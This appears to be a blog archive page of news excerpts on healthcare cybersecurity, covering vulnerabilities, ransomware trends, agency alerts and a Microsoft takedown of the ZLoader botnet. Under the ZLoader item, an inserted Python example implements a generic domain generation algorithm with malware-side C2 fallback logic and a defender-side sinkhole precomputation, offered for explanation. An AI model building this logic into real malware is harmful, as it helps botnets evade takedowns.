Jun 09

It is important that Covered Entities and Business Associates understand the HIPAA password requirements and the best way to comply with them, because if a data breach is found to be attributable to a lack of compliance, the penalties could be significant. However, understanding the HIPAA password requirements is not straightforward. HIPAA is intentionally technology-neutral; so whereas Security Standard §164.312(d) stipulates Covered Entities must “implement procedures to verify that a person or entity seeking access to electronic protected health information is the one claimed”, there is no indication of what procedures should be implemented, or even that user verification should be password-based. Guidance published by the Department of Health and Human Services suggests there are three ways in which users can verify their identity: with something only known to the user, such as a password or PIN; with something the user possesses, such as a smart card or key; or with something unique to the user, such as a fingerprint or facial image. In addition to the above, a required...

DogWalk Zero-day Windows MSDT Vulnerability Gets Unofficial Patch
Jun 08

Another zero-day vulnerability has been identified that affects the same Windows tool as Follina. While the vulnerability is not known to have been exploited in the wild, the bug is exploitable, and the recent interest in and widespread exploitation of the Follina vulnerability make exploitation of this flaw more likely. The vulnerability affects the Microsoft Diagnostic Tool (MSDT) and is a path traversal flaw that can be exploited to copy an executable file to the Windows Startup folder. The vulnerability can be exploited by sending a specially crafted .diagcab file via email or by convincing a user to download the file from the Internet. .diagcab files are Cabinet files that include a diagnostic configuration file. In this attack, once the startup entry is implanted, the executable file will be run the next time Windows is restarted. The vulnerability was identified and publicly disclosed by security researcher Imre Rad in January 2020. Microsoft decided not to issue a fix as, in its view, this was technically not a security issue, and since .diagcab files are considered unsafe they are...

HC3 Warns Healthcare Sector About Growing Threat from Emotet Malware
Jun 08

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has issued a warning to the healthcare sector about the threat from Emotet malware. Emotet was first detected in 2014 and was initially a banking Trojan; however, the malware has been updated over the years and has had new features added. In addition to serving as a banking Trojan, the malware includes a dropper for delivering other malware variants and is offered to other cybercriminal groups under the infrastructure-as-a-service (IaaS) model. Emotet has been used to deliver a range of malware variants including IcedID, Trickbot, Qbot, Azorult, and ransomware payloads such as Ryuk and BitPaymer. According to Europol, Emotet is the most dangerous malware variant currently in use and has infected one in five organizations worldwide. Data from Malwarebytes indicates 80% of malware infections at healthcare organizations involved Trojans, and Emotet was the most common Trojan deployed in attacks on the healthcare sector. Emotet is operated by the MUMMY SPIDER threat...

Healthcare Ransomware Attacks Increased by 94% in 2021
Jun 06

Ransomware attacks on healthcare organizations increased by 94% year over year, according to the 2022 State of Ransomware Report from cybersecurity firm Sophos. The report is based on a global survey of 5,600 IT professionals and included interviews with 381 healthcare IT professionals from 31 countries. This year’s report focused on the rapidly evolving relationship between ransomware and cyber insurance in healthcare. 66% of surveyed healthcare organizations said they had experienced a ransomware attack in 2021, up from 34% in 2020, and the volume of attacks increased by 69%, which was the highest of all industry sectors. Healthcare had the second-highest increase (59%) in the impact of ransomware attacks. According to the report, the number of healthcare organizations that paid the ransom has doubled year over year. In 2021, 61% of healthcare organizations that suffered a ransomware attack paid the ransom – the highest percentage of any industry sector. The global average was 46%, which is almost twice the percentage of the previous year. Paying the ransom may help healthcare...

Atlassian Releases Patch for Maximum Severity Widely Exploited Vulnerability in Confluence Server and Data Center
Jun 05

Atlassian has released a patch to fix a critical zero-day vulnerability that affects all supported versions of Confluence Server and Data Center. The vulnerability – tracked as CVE-2022-26134 – has a maximum CVSS severity score of 10 out of 10 and can be exploited remotely by unauthenticated attackers to achieve code execution. According to security researchers, exploiting the flaw is trivial, with no user interaction or privileges required. Last week, cybersecurity firm Volexity detected exploitation of the vulnerability while responding to a security breach. The researchers were able to reproduce the exploit for the flaw and shared details of the vulnerability with Atlassian last week. Volexity reports that in the incident its researchers investigated, the attackers were most likely based in China and exploited the vulnerability to run malicious code and install webshells such as BEHINDER and China Chopper. The attackers conducted reconnaissance, checked local Confluence databases and dumped user tables, altered web access logs to remove traces of exploitation, and wrote...

Healthcare Organizations Warned About Maximum Severity Vulnerabilities in Illumina Devices
Jun 03

Five vulnerabilities have been identified in the Illumina Local Run Manager (LRM), which is used by Illumina In Vitro Diagnostic (IVD) devices and Illumina Research Use Only (RUO) instruments. The affected devices are used for clinical diagnostic DNA sequencing and testing for various genetic conditions, and for research use. Four of the vulnerabilities are critical, with three having a maximum CVSS severity score of 10 out of 10. The vulnerabilities affect the following devices and instruments:

Illumina IVD Devices
NextSeq 550Dx: LRM Versions 1.3 to 3.1
MiSeq Dx: LRM Versions 1.3 to 3.1

Illumina RUO Devices
NextSeq 500 Instrument: LRM Versions 1.3 to 3.1
NextSeq 550 Instrument: LRM Versions 1.3 to 3.1
MiSeq Instrument: LRM Versions 1.3 to 3.1
iSeq 100 Instrument: LRM Versions 1.3 to 3.1
MiniSeq Instrument: LRM Versions 1.3 to 3.1

A threat actor could exploit the vulnerabilities remotely, take control of the instruments, and perform any action at the operating system level, such as modifying the settings, configurations, software, or data on the instrument. It would also be...

FBI Thwarted ‘Despicable’ Cyberattack on Boston Children’s Hospital
Jun 03

In 2021, the Federal Bureau of Investigation (FBI) helped Boston Children’s Hospital mitigate a cyberattack by Iranian state-sponsored hackers before any damage could be caused. FBI Director, Christopher Wray, said the attempted cyberattack was “one of the most despicable cyberattacks I have ever seen.” Speaking at Boston College for the Boston Conference on Cyber Security, Wray said Iranian state-sponsored hackers exploited a vulnerability in a popular software solution made by the Californian cybersecurity vendor Fortinet. The FBI was alerted to the breach and the pending attack by another intelligence agency and notified the hospital on August 3, 2021. Wray said the FBI met with representatives of the hospital and provided information that helped the hospital identify and mitigate the threat. Wray said this was “a great example of why we deploy in the field the way we do, enabling that kind of immediate, before-catastrophe-strikes response,” and explained that the incident should serve as a reminder to all healthcare organizations to ensure they have an incident...

BD Issues Security Advisories About Pyxis and Synapsys Vulnerabilities
Jun 01

BD has issued security advisories about two vulnerabilities that affect certain BD Pyxis automated medication dispensing system products and the BD Synapsys microbiology informatics software platform.

BD Pyxis – CVE-2022-22767

According to BD, certain BD Pyxis products have been installed with default credentials and may still operate with those credentials. In some scenarios, the affected products may have been installed with the same default local operating system credentials or domain-joined server(s) credentials that may be shared across product types. If a threat actor were to exploit the vulnerability, it would be possible to gain privileged access to the underlying file system, which would allow access to ePHI or other sensitive information. The vulnerability is tracked as CVE-2022-22767 and has a CVSS v3 base score of 8.8 out of 10 (high severity). The following products are affected by the vulnerability:

BD Pyxis ES Anesthesia Station
BD Pyxis CIISafe
BD Pyxis Logistics
BD Pyxis MedBank
BD Pyxis MedStation 4000
BD Pyxis MedStation ES
BD Pyxis MedStation ES Server
BD...

Zero Day Microsoft Office Vulnerability can be Exploited with Macros Disabled
Jun 01

Microsoft has issued a security advisory and has provided a workaround to prevent a zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) from being exploited. The vulnerability is tracked as CVE-2022-30190 and has been dubbed Follina by security researchers. According to Microsoft, “a remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word.” Over the weekend, security researcher nao_sec found a Word document that was leveraging remote templates to execute PowerShell commands on targeted systems via the MS-MSDT URL protocol scheme. In a recent blog post, security researcher Kevin Beaumont said the documents are not being detected as malicious by Microsoft Defender, and detection by antivirus solutions is poor because the documents used to exploit the vulnerability do not contain any malicious code. Instead, they leverage remote templates to download an HTML file from a remote server, which allows an attacker to run malicious PowerShell commands. Most email attacks that use attachments for...

CISA Adds 75 Vulnerabilities to the Known Exploited Vulnerability Catalog
May 31

Last week, the Cybersecurity and Infrastructure Security Agency (CISA) added a further 75 vulnerabilities to its Known Exploited Vulnerability Catalog. The Known Exploited Vulnerability Catalog is a list of vulnerabilities in software and operating systems that are known to be exploited in real-world attacks. The list now includes 737 vulnerabilities. The latest additions came in three batches that were added on Tuesday (21), Wednesday (20), and Thursday (34). Under Binding Operational Directive (BOD) 22-01, all Federal Civilian Executive Branch (FCEB) agencies are required to scan for the vulnerabilities and ensure patches are applied or the vulnerabilities are otherwise mitigated within two weeks. The majority of the vulnerabilities added to the list last week are not new flaws. In most cases, patches were released to address the flaws several years ago, and in some cases the vulnerabilities were publicly disclosed 12 years ago. Some of the vulnerabilities affect products that have long since passed end-of-life, such as Adobe Flash Player, Virtual System/Server Administrator...

What is CMMC Compliance?
May 30

Following a recent review of the Cybersecurity Maturity Model Certification (CMMC) framework, the requirements for CMMC compliance have changed considerably. This blog discusses the reasons for the change, what it means for companies in the Defense Industrial Base, and what prime contractors and subcontractors now have to do to become CMMC 2.0 compliant. The history of government procurement goes back to the 18th Century and is – some claim – enshrined in Article 6 of the U.S. Constitution. Over the years, as the number of government agencies grew, each agency developed its own acquisition guidelines – making it complicated for suppliers and contractors in the private sector to do business with different government agencies. To resolve the complexity of supplying goods and services to different government agencies, the Federal Acquisition Regulation was introduced in 1984 to “provide for coordination, simplicity, and uniformity in the Federal acquisition process”. However, supplying goods and services to government agencies has continued to be complicated due to...

Study Identifies Risks Associated with 3rd and 4th Party Scripts on Websites
May 27

A recent study by Source Defense examined the risks associated with the use of third- and fourth-party code on websites and found that all modern, dynamic websites included code that could be targeted by hackers to gain access to sensitive data. Source Defense explained that websites typically have their own third-party supply chains, with those third parties providing a range of services and functions related to site performance, tracking and analytics, and improving conversion rates to generate more sales. The inclusion of third- and fourth-party code on websites also introduces security and compliance risks. On the compliance side, tracking code has the potential to violate data privacy laws such as the EU’s General Data Protection Regulation (GDPR), and from a security perspective, the code included on websites may have vulnerabilities that can be exploited by threat actors to gain access to sensitive data, including protected health information. To explore the risks associated with third- and fourth-party code, Source Defense scanned the top 4,300 websites based on traffic and...

Former IT Consultant Charged with Intentionally Causing Damage to Healthcare Company’s Server
May 27

An information technology consultant who worked as a contractor at a suburban healthcare company in Chicago has been charged with illegally accessing the company’s network and intentionally causing damage to a protected computer. Aaron Lockner, 35, of Downers Grove, IL, worked for an IT company that had a contract with a healthcare company to provide security and technology services. Lockner was provided with access to the network of the healthcare provider’s clinic in Oak Lawn, IL, to perform the contracted IT services. In February 2018, Lockner applied for an employment position with the healthcare provider, but his application was denied. Lockner was then terminated from the IT firm in March 2018. A month later, on or around April 16, 2018, Lockner is alleged to have remotely accessed the computer network of the healthcare company without authorization. According to the indictment, Lockner knowingly caused the transmission of a program, information, code, and command, and as a result of his actions, intentionally caused damage to a protected computer. The computer intrusion...

Verizon Data Breach Investigations Report Reveals 2021 Data Breach Trends
May 25

For the past 15 years, Verizon has been publishing annual Data Breach Investigations Reports (DBIR), with this year’s report confirming just how bad the past 12 months have been. Verizon described the past 12 months as representing an unprecedented year in cybersecurity history. “From very well-publicized critical infrastructure attacks to massive supply chain breaches, the financially motivated criminals and nefarious nation-state actors have rarely, if ever, come out swinging the way they did over the last 12 months,” explained Verizon. The 2022 DBIR was compiled in conjunction with 87 partner organizations using data from 23,896 security incidents, of which 5,212 were confirmed data breaches. 849 of the security incidents analyzed in the report occurred in the healthcare sector, with 571 of those incidents resulting in confirmed data breaches. The report confirms there was a major increase in ransomware attacks in 2021, increasing 13% from the previous year. To add some perspective, the increase is greater than the combined increases over the previous five years. As Verizon...

HHS Shares Information on Advanced Persistent Threat Groups Linked with the Russian Intelligence Services
May 23

The U.S. Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has issued a threat brief providing information on the cyber organizations of the Russian Intelligence Services which pose a threat to organizations in the United States, including the healthcare and public health (HPH) sector. The threat brief provides information on four key advanced persistent threat actors which conduct offensive cyber activities and espionage within the Russian Intelligence Services. These APT actors have been linked to the Federal Security Service (FSB), the Foreign Intelligence Service (SVR), and the Main Intelligence Directorate of the General Staff of the Armed Forces (GRU). The FSB is equivalent to the Federal Bureau of Investigation in the U.S. and is mostly concerned with domestic intelligence and foreign intelligence from Russia’s near abroad. The SVR is equivalent to the U.S. Central Intelligence Agency (CIA) and collects foreign intelligence from military, strategic, economic, scientific, and technological targets. The GRU is the equivalent of...

CISA Issues Emergency Directive to Patch Vulnerable VMware Products
May 20

An emergency directive has been issued by the Cybersecurity and Infrastructure Security Agency (CISA) to all federal agencies, requiring them to take steps to address two vulnerabilities in certain VMware products that are likely to be rapidly exploited in the wild, and two previous vulnerabilities in VMware products that were disclosed in April which are being exploited by multiple threat actors, including Advanced Persistent Threat (APT) actors. The latest vulnerabilities, tracked as CVE-2022-22972 (critical) and CVE-2022-22973 (high severity), and the two vulnerabilities from April affect 5 VMware products:

VMware Workspace ONE Access (Access) Appliance
VMware Identity Manager (vIDM) Appliance
VMware vRealize Automation (vRA)
VMware Cloud Foundation
vRealize Suite Lifecycle Manager

CVE-2022-22972 is an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users. If a malicious actor has network access to the UI, the flaw can be exploited to gain administrative access without authentication....

Cybersecurity Agencies Share Most Common Attack Vectors for Initial Access and Recommended Mitigations
May 18

According to a recent security advisory issued by the Five Eyes cybersecurity agencies in the US, UK, Canada, Australia, and New Zealand, the most common attack vectors used by cyber threat actors for initial access to networks are exploits of public-facing applications, external remote services, trusted relationships, phishing, and compromised credentials for valid user accounts. These attack methods often succeed due to poor security practices, bad cyber hygiene, weak controls, and poor security configurations. The security advisory details the most commonly exploited controls and practices and provides recommendations for mitigations to strengthen security and block these attack vectors.

Top 10 Security Weaknesses Exploited by Hackers

The top ten security weaknesses exploited by hackers consist of poor security practices, weak security controls, misconfigurations, and unsecured systems, which allow the most common attack vectors to be used.

Slow software updates and patching

The failure to update software promptly and apply patches for known vulnerabilities gives attackers a...

Five Eyes Intelligence Alliance Warns of Increase in Cyberattacks Targeting Managed Service Providers
May 13

The Five Eyes intelligence alliance, which consists of cybersecurity agencies from the United States, United Kingdom, Australia, New Zealand, and Canada, has issued a joint alert warning about the increasing number of cyberattacks targeting managed service providers (MSPs). MSPs are attractive targets for cybercriminals and nation-state threat actors. Many businesses rely on MSPs to provide information and communication technology (ICT) and IT infrastructure services, as it is often easier and more cost-effective than developing the capabilities to handle those functions internally. In order to provide those services, MSPs require trusted connectivity and privileged access to the networks of their clients. Cyber threat actors target vulnerable MSPs and use them as the initial access vector to gain access to the networks of all businesses and organizations that they support. It is far easier to conduct a cyberattack on a vulnerable MSP and gain access to the networks of dozens of businesses than to target those businesses directly. When MSP systems are compromised, it may take...

Bill Introduced that Seeks to Improve Medical Device Cybersecurity
May 11

A new bill has been introduced that seeks to address the cybersecurity of medical devices and would require manufacturers of medical devices to meet certain minimum cybersecurity standards for the entire lifecycle of their products. The medical device cybersecurity provisions of the bill – H.R. 7667, Food and Drug Amendments of 2022 – call for device manufacturers to “have a plan to appropriately monitor, identify, and address in a reasonable time postmarket cybersecurity vulnerabilities and exploits, including coordinated vulnerability disclosure and procedures,” and to “design, develop, and maintain processes and procedures to ensure the device and related systems are cybersecure.” The processes and procedures should include making “updates and patches available to the cyber device and related systems throughout the lifecycle of the cyber device.” Those patches and updates are required on a reasonably justified regular cycle to address known vulnerabilities, and, as soon as possible out of cycle, to address critical vulnerabilities that could cause uncontrolled...

HC3 Highlights Trends in Ransomware Attacks on the HPH Sector
May 10

The tactics, techniques, and procedures (TTPs) used by ransomware and other cyber threat actors are constantly evolving to evade detection and allow the groups to conduct more successful attacks. The TTPs employed in the first quarter of 2022 by ransomware gangs have been analyzed and shared by the Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3). In Q1, 2022, the majority of ransomware attacks on the Healthcare and Public Health Sector (HPH) were conducted by five ransomware-as-a-service groups. LockBit 2.0 and Conti each accounted for 31% of attacks, followed by SunCrypt (16%), ALPHV/BlackCat (11%), and Hive (11%). The financially motivated threat groups FIN7 and FIN12 have also shifted their activities and have moved to ransomware operations, with FIN7 working with ALPHV and FIN12 extensively involved in attacks on the HPH sector. FIN12’s involvement has decreased the timescale for conducting attacks from 5 days to 2 days. Ransomware gangs often work with initial access brokers (IABs) that specialize in gaining access to...

NIST Publishes Updated Cybersecurity Supply Chain Risk Management Guidance
May 06

On Thursday, the National Institute of Standards and Technology (NIST) published updated cybersecurity supply chain risk management (C-SCRM) guidance to help organizations develop an effective program for identifying, assessing, and responding to cybersecurity risks throughout the supply chain. Cyber threat actors are increasingly targeting the supply chain. A successful attack on a single supplier can allow the threat actor to compromise the networks of all companies that use the product or service, as was the case with the REvil ransomware attack on Kaseya in 2021. The threat actors exploited a vulnerability in Kaseya VSA software and the attack affected up to 1,500 businesses. The publication, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (NIST Special Publication 800-161 Revision 1), is the result of a multiyear process that included the release of two draft versions of the guidance. The updated guidance can be used to identify, assess, and respond to cybersecurity risks throughout the supply chain at all levels of an organization. While...

Average Ransom Payment Dropped by 34% in Q1, 2022
May 05

The average ransom payment in ransomware attacks fell by 34% in Q1, 2022, from an all-time high in Q4, 2021, according to ransomware incident response firm Coveware. The average ransom payment in Q1, 2022 was $211,259 and the median ransom payment was $73,906. The fall in total ransom payments has been attributed to several factors. Coveware suggests ransomware gangs have been targeting smaller organizations and issuing lower ransom demands, due to the increased scrutiny by law enforcement when attacks are conducted on large enterprises. The median size of victim companies has been falling since Q4, 2020, and is now around 160 employees. This appears to be the sweet spot, where the companies have sufficient revenues to allow sizable ransoms to be paid, but are not so large that attacks will result in considerable scrutiny by law enforcement. Another reason why total ransom payments have fallen is that fewer victims of ransomware attacks have been paying the ransom. The number of victims of ransomware attacks that pay the ransom has been steadily declining, from 85% of victims in Q1 2019...

FBI Issues Warning About BEC Scams as Losses Increase to $43 Billion
May 05

The Federal Bureau of Investigation (FBI) has issued a public service announcement warning about the threat of Business Email Compromise/Email Account Compromise (BEC/EAC) scams. The number of attacks reported to the FBI Internet Crime Complaint Center (IC3) and the amount of money lost to these scams continues to grow each year, with losses to BEC/EAC scams increasing 65% between July 2019 and December 2021. BEC/EAC scams are the leading cause of losses to cybercrime. Between June 2016 and December 2021, IC3 received 241,206 complaints about domestic and international BEC/EAC attacks with reported losses of more than $43.3 billion. The IC3 2021 Internet Crime Report shows victims reported losses of $2.4 billion in 2021 across 19,954 complaints – around one-third of all losses to cybercrime in 2021. The actual losses to these scams are undoubtedly far higher, as many victims do not report the scams to the FBI, especially if the losses are relatively small. BEC/EAC scams involve compromising email accounts and using them to send emails to businesses and individuals who perform...

HHS Information Security Program Rated ‘Not Effective’
May 04

An audit of the Department of Health and Human Services conducted for the HHS’ Office of Inspector General (OIG) to assess compliance with the Federal Information Security Modernization Act of 2014 (FISMA) in the fiscal year 2021 has seen the agency’s information security program rated ‘not effective’, as was the case in fiscal years 2018, 2019, and 2020. The audit was conducted at five of the 12 operating divisions of the HHS, although OIG did not state which five divisions were audited. In order to receive an effective rating, the HHS is required to reach the ‘Managed and Measurable’ maturity level for the Identify, Protect, Detect, Respond, and Recover function areas, as required by DHS guidance and the FY 2021 Inspector General FISMA Reporting Metrics. OIG said in the report that the HHS has continued to make changes to strengthen the maturity of its enterprise-wide cybersecurity program and is making progress to sustain cybersecurity across all FISMA domains. The HHS security program strengthened the maturity of controls for several individual FISMA metrics,...

Operational Continuity-Cyber Incident Checklist Published by HSCC
May 03

The Health Sector Coordinating Council’s (HSCC) Cybersecurity Working Group (CWG) has published an Operational Continuity-Cyber Incident (OCCI) checklist which serves as a flexible template for responding to and recovering from serious cyberattacks that cause extended system outages, such as ransomware attacks. Ransomware attacks on healthcare organizations increased significantly during the pandemic and continue to be conducted at elevated levels. Ransomware threat actors steal sensitive data that has a high value on the black market and threaten to publish that data to pressure victims into paying, and the extended system outages due to the attacks can cause considerable financial losses, increasing the probability of the ransom being paid. Warnings have recently been issued by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) about ransomware groups that are actively targeting critical infrastructure, including healthcare organizations. In addition to cybercriminal groups, hospitals are a target for nation-state threat...

WEDI Makes Healthcare-Specific Recommendations for Improving the NIST Cybersecurity Framework
Apr 29

The Workgroup for Electronic Data Interchange (WEDI) has responded to the request for information from the National Institute of Standards and Technology (NIST) and has made several recommendations for improving the NIST cybersecurity framework and supply chain risk management guidance to help healthcare organizations deal with some of the most pressing threats facing the sector. Ransomware is one of the main threats facing the healthcare industry, and that is unlikely to change in the short to medium term. To help healthcare organizations deal with the threat, WEDI has suggested NIST increase its focus on ransomware and address the issue of ransomware directly in the cybersecurity framework. NIST published a new ransomware resource in February 2022, which contains valuable information on protecting against, detecting, responding to, and recovering from ransomware attacks. WEDI feels the inclusion of ransomware within the cybersecurity framework will expand the reach and impact of the resource. WEDI has also recommended the inclusion of specific case studies of healthcare...

15 Most Exploited Vulnerabilities in 2021
Apr29

The Five Eyes security agencies, an alliance of intelligence agencies from Australia, Canada, New Zealand, the United Kingdom, and the United States, have issued a joint advisory about the 15 vulnerabilities in software and operating systems that were most commonly targeted by nation-state hackers and cybercriminal organizations in 2021. Throughout 2021, malicious cyber actors targeted newly disclosed critical software vulnerabilities in attacks against a wide range of industry sectors, including public and private sector organizations. 11 of the most routinely targeted vulnerabilities were publicly disclosed in 2021, although older vulnerabilities continue to be exploited. The 15 most exploited vulnerabilities include 9 that allow remote code execution, 2 elevation of privilege flaws, and security bypass, path traversal, arbitrary file reading, and arbitrary code execution flaws. Top of the list was the maximum severity Log4Shell vulnerability in the Apache Log4j open source logging framework. The vulnerability – CVE-2021-44228 – can be remotely exploited by a threat actor...

Five Eyes Agencies Warn Critical Infrastructure Orgs About Threat of Russian State-Sponsored and Criminal Cyberattacks
Apr27

The Five Eyes cybersecurity agencies have recently issued a joint security alert warning about the threat of cyberattacks on critical infrastructure by Russian nation-state threat actors and pro-Russia cybercriminal groups. Intelligence gathered by the agencies indicates the Russian government has been exploring opportunities for conducting cyberattacks against targets in the West in retaliation for the sanctions imposed on Russia and the support being provided to Ukraine. The agencies warn that Russian state-sponsored hacking groups have been conducting Distributed Denial of Service (DDoS) attacks in Ukraine and are known to have used destructive malware against government and critical infrastructure organizations in Ukraine. These hacking groups are highly skilled: they can gain access to IT networks, maintain persistence, exfiltrate sensitive data, and cause major disruption to critical systems, including industrial control systems. The alert names several Russian government and military organizations that have engaged in these malicious activities, including the Russian Federal...

2021 Saw Record Numbers of DDoS Attacks on the Healthcare Industry
Apr22

A new report from Comcast Business indicates 2021 was another record-breaking year for Distributed Denial of Service (DDoS) attacks. 9.84 million DDoS attacks were reported in 2021, which is a 14% increase from 2019, although slightly lower than the previous year when 10.1 million attacks were reported. The slight decline in attacks was due to several factors. 2020 was a particularly bad year as it was a full lockdown year where employees were working remotely and students were learning from home, which provided attackers with a unique landscape against which to launch an unprecedented number of DDoS attacks, and the high prices of cryptocurrencies in 2021 meant many threat actors diverted their botnets from conducting DDoS attacks to mining cryptocurrencies. DDoS attackers spared no one in 2021; however, 73% of attacks were conducted on just four sectors – healthcare, government, finance, and education. Attackers followed seasonal trends and activities throughout the year, with education being attacked to coincide with the school year, and COVID-19 and vaccine availability drove...

FBI Issues Warning About BlackCat Ransomware Operation
Apr21

The Federal Bureau of Investigation (FBI) has issued a TLP:WHITE flash alert about the BlackCat ransomware-as-a-service (RaaS) operation. BlackCat, also known as ALPHV, was launched in November 2021, shortly after the shutdown of the BlackMatter ransomware operation, which was itself a rebrand of DarkSide. DarkSide was behind the ransomware attack on Colonial Pipeline. A member of the operation has claimed they are a former affiliate of BlackMatter/DarkSide that branched out on their own; however, it is more likely that BlackCat is simply a rebrand of BlackMatter/DarkSide. The FBI said many of the developers and money launderers involved with the BlackCat operation have been linked to DarkSide/BlackMatter, which indicates they have extensive networks and considerable experience with running RaaS operations. The BlackCat RaaS operation has not been active for long, but the group has already claimed at least 60 victims worldwide. BlackCat typically targets large organizations and demands ransom payments of several million dollars in Bitcoin or Monero, although the...

HHS Issues Warning to HPH Sector about Hive Ransomware
Apr20

The HHS’ Office of Information Security Health Sector Cybersecurity Coordination Center (HC3) has issued a TLP:WHITE alert about the Hive ransomware group, a particularly aggressive cybercriminal operation that has extensively targeted the healthcare sector in the United States. HC3 has shared an analysis of the tactics, techniques, and procedures (TTPs) known to be used by the group in its attacks, along with cybersecurity principles and mitigations that can be adopted to improve resilience against Hive ransomware attacks. The Hive ransomware group has been conducting attacks since at least June 2021. The group is known for using double extortion tactics, where sensitive data is exfiltrated prior to file encryption and threats are issued to publish the data if the ransom is not paid. The group is also known to contact victims by phone to pressure them into paying the ransom. Hive is a ransomware-as-a-service (RaaS) operation in which affiliates are recruited to conduct attacks on the gang’s behalf in exchange for a cut of the profits that are generated, which allows the core...

What is a HIPAA Violation?
Apr18

To best answer the question what is a HIPAA violation, it is necessary to explain what HIPAA is, who it applies to, and what constitutes a violation; for although most people believe they know what a HIPAA violation is, evidence suggests otherwise. The evidence that there may be a misunderstanding about what a HIPAA violation is comes from the Department of Health and Human Services (HHS) Enforcement Highlights web page. The web page is regularly updated with statistics relating to complaints about HIPAA violations, compliance reviews, and enforcement action. According to the most recent update, the HHS has received almost 300,000 complaints since the compliance date of the Privacy Rule (April 2003). On its behalf, the Office for Civil Rights (OCR) has conducted tens of thousands of compliance reviews or intervened with technical assistance before a review was necessary. However, in more than 200,000 cases, complaints received by HHS have not been reviewed by OCR for reasons such as the entity alleged to have violated HIPAA was not a HIPAA Covered Entity, or the alleged activity...

Microsoft Sinkholes Notorious ZLoader Botnet
Apr15

The notorious ZLoader cybercrime botnet, which was used to deliver Ryuk ransomware in attacks on healthcare providers, has been disabled by Microsoft’s Digital Crimes Unit (DCU). Microsoft recently obtained a court order from the United States District Court for the Northern District of Georgia authorizing the seizure of 65 hard-coded domains used by the ZLoader botnet for command-and-control communications. Those domains have now been sinkholed, preventing the operator of the botnet from communicating with devices infected with ZLoader malware. ZLoader malware included a domain generation algorithm (DGA) which is triggered if communication with the hard-coded domains is not possible, which serves as a failsafe against any takedown efforts. The court order also allowed Microsoft to seize 319 DGA-registered domains. Microsoft is working to block the registration of any future DGA domains. ZLoader is part of a family of malware variants that descended from the ZeuS banking Trojan. Initially, ZeuS was used for credential and financial theft, with the aim of transferring money out of...
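The failsafe described above, a domain generation algorithm (DGA) that kicks in when the hard-coded command-and-control domains stop resolving, and the defender's counter of precomputing and seizing the generated domains, are easiest to see in code. The Python below is an added example written for this page; it is not Microsoft's code, and the generator is an illustrative generic DGA, not ZLoader's real algorithm. The seed value, the TLD list, the number of domains per day and the sample dates and domain names are all assumptions.

```python
import datetime as dt
import hashlib
import string

# Illustrative DGA. This is NOT ZLoader's algorithm; it only shows the mechanism:
# malware and operator share a secret seed baked into the binary, and both derive
# the same list of candidate C2 domains from the current date.
SEED = b"example-seed-not-real"   # assumption: stands in for a seed embedded in the malware
TLDS = ("com", "net", "org")      # assumption: TLDs the generator cycles through
DOMAINS_PER_DAY = 8               # assumption: candidates generated per day
DEMO_DAY = dt.date(2022, 4, 13)   # constructed date used by the demo below


def dga_domains(day: dt.date, seed: bytes = SEED, count: int = DOMAINS_PER_DAY) -> list[str]:
    """Deterministically derive `count` candidate domains for one calendar day."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(seed + day.isoformat().encode() + bytes([i])).hexdigest()
        # 12 hex pairs -> 12 lowercase letters: a pseudo-random looking label
        label = "".join(string.ascii_lowercase[int(digest[j:j + 2], 16) % 26]
                        for j in range(0, 24, 2))
        domains.append(f"{label}.{TLDS[i % len(TLDS)]}")
    return domains


def c2_candidates(hardcoded: list[str], resolvable: set[str], day: dt.date) -> list[str]:
    """Model the failsafe: keep using hard-coded C2 domains while any of them still
    resolves; once all are sinkholed or seized, fall back to the day's DGA output.
    `resolvable` stands in for the result of DNS lookups."""
    live = [d for d in hardcoded if d in resolvable]
    return live if live else dga_domains(day)


def takedown_list(start: dt.date, days: int) -> set[str]:
    """Defender side: with the seed recovered from a sample, precompute every domain
    the DGA will produce over a window so they can be registered or sinkholed first."""
    return {d for n in range(days) for d in dga_domains(start + dt.timedelta(days=n))}


if __name__ == "__main__":
    hardcoded = ["c2-one.example", "c2-two.example"]      # constructed names
    print("before seizure:", c2_candidates(hardcoded, {"c2-two.example"}, DEMO_DAY))
    print("after seizure: ", c2_candidates(hardcoded, set(), DEMO_DAY)[:3], "...")
    print("domains to pre-register for 30 days:", len(takedown_list(DEMO_DAY, 30)))
```

The point of `takedown_list` is the one the article makes: seizing the hard-coded domains alone only forces the malware onto the DGA, so a takedown has to cover the generated domains as well, which is only possible once the algorithm and seed have been recovered from a sample.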

JekyllBot:5 Vulnerabilities Allow Hackers to Take Control of Aethon TUG Hospital Robots
Apr14

Five zero-day vulnerabilities have been identified in Aethon TUG autonomous mobile robots, which are used in hospitals worldwide for transporting goods, medicines, and other medical supplies. Hospital robots are attractive targets for hackers. If access to the robots is gained, a variety of malicious actions could be performed. Attackers could trigger a denial-of-service condition to disrupt hospital operations for extortion, and since sensitive patient data is fed into the devices, exploitation of the vulnerabilities could provide hackers with access to patient data. The robots are given privileged access to restricted areas within healthcare facilities, which would not normally be accessible to unauthorized individuals. The robots can open doors and access elevators, and could be used to block access, shut down elevators, or bump into staff and patients. Since the robots have integrated cameras, they could be hijacked and used for surveillance. The robots could also potentially be hijacked and used to deliver malware or could serve as a launchpad for more extensive cyberattacks...

Warning Issued About Phishing Campaigns Involving Legitimate Email Marketing Platforms
Apr12

A recent data breach at the email marketing platform vendor Mailchimp has prompted a warning from the Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) about the risk of phishing attacks using the platform. The breach came to light when the cryptocurrency hardware wallet provider, Trezor, investigated a phishing campaign targeting its customers that used the email addresses registered to Trezor accounts, which uncovered a data breach at Mailchimp. Mailchimp’s investigation confirmed that threat actors had successfully compromised internal accounts of its customer support and account administration teams, and while those accounts have now been secured, the attackers were able to gain access to the accounts of 300 Mailchimp users and were able to extract audience data from 102 of those accounts. API keys were also obtained by the attackers that allow them to create email campaigns for use in phishing attacks without having to access customer portals. Since accounts used by Mailchimp customers to send marketing campaigns such as...

Increase in Class Action Lawsuits Following Healthcare Data Incidents
Apr12

